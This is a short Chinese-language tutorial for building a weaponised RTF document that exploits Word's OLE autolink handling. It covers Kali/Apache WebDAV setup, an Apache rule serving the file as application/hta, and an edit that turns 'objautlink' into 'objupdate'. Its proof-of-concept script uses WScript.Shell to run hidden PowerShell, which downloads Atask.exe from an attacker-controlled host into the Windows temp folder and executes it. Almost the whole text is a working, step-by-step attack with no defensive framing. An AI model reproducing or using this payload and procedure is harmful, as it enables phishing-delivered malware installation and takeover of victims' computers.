Apache利用的是kalia

Kali下2个路径

web 路径 /var/www/html

apace 配置文件路径 /etc/apache2/apache2.conf

准备文件2个

1：poc

POC的内容：

<script> poc=new ActiveXObject("WScript.Shell"); poc.run('%SystemRoot%/system32/WindowsPowerShell/v1.0/powershell.exe -windowstyle hidden (new-object System.Net.WebClient).DownloadFile(/'http://ip_url/Atask.exe/', /'c:/windows/temp/Atask.exe/'); c:/windows/temp/Atask.exe', 0);window.close(); </script>

2：word 文档

随意 例如： a.docx

一：KaLi  开启DAV

a2enmod dav  a2enmod dav_fs  a2enmod dav_lock  a2enmod headers  service apache2 restart

二：Kali服务器上操作

mv a.docx /var/www/html/a.rtf

三:本机电脑客户端操作

 新建word => 插入 => 对象 -> 文件名字 http://ip/a.rtf 勾选 连接到文件 保存成 rtf文件 （b.rtf）

四：Kali服务器上 删除 /var/www/html/a.rtf 文件，把一开始准备的 poc 复制成 a.rtf

mv poc /var/www/html/a.rtf

之后 修改Apache配置文件 vim /etc/apache2/apache2.conf

增加如下内容：

<Directory />  Dav on  </Directory>  <Directory /var/www/html/ms/>  Header set Content-Type "application/hta"  </Directory>

保存 service apache2 restart

五:客户端

用文本编辑器 打开 b.rtf 找到： `/object/objautlink/rsltpict`  替换为 `/object/objautlink/objupdate/rsltpict`：

保存。。。制作完成